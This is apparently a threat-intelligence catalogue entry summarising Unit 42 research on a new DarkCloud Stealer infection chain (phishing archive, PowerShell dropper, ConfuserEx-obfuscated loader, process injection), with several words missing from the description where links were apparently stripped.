216.73.216.133

New Infection Chain and ConfuserEx-Based Obfuscation for DarkCloud Stealer

· Published 08/08/2025 08:00 · Modified 10/08/2025 19:40

Export JSON

Essential information

Published
08/08/2025 08:00
Modified
10/08/2025 19:40
Tags
2025-08-07 2025-08-08 anti-analysis confuserex darkcloud stealer infection chain infostealer obfuscation process-hollowing runpe visual basic 6
Related entities
10 observables, 5 techniques (mitre), 1 malware

Description

Unit 42 researchers have observed changes in the distribution and techniques of . The new , first seen in April 2025, involves and a final payload written in . The attack begins with a phishing email containing an archive file, which leads to the download and execution of a PowerShell script. This script then drops an executable protected by , which ultimately injects the payload into a legitimate process. The malware employs various techniques, including encryption and of strings. These changes highlight the evolving evasion strategies of cybercriminals and underscore the need for advanced, behavior-based threat detection approaches.

External references